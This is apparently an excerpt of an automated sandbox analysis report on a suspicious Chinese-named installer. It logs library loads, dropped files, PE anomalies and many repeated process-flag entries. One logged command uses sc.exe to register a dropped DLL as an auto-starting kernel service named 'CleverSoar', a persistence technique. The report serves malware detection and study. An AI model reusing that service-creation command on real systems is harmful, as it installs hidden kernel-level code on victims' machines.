Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic file information: File size 5695204 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1817031002.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1817308914.0000000003690000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_006257D0
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: real checksum: 0x0 should be: 0x576c76
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: is-U9N4C.tmp.6.drStatic PE information: section name: .xdata
Source: updat4.vac.6.drStatic PE information: section name: .00cfg
Source: updat4.vac.6.drStatic PE information: section name: .voltbl
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD0750B push ecx; ret 6_2_6CD0751E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CBB0F00 push ss; retn 0001h6_2_6CBB0F0A
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDD4F10 push eax; ret 6_2_6CDD4F2E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD399F4 push 004AC35Ch; ret 6_2_6CD39A0E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDD5290 push eax; ret 6_2_6CDD52BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A45F4 push 0064C35Ch; ret 10_2_005A460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063FB10 push eax; ret 10_2_0063FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063FE90 push eax; ret 10_2_0063FEBE
Source: update.vac.1.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\is-U9N4C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
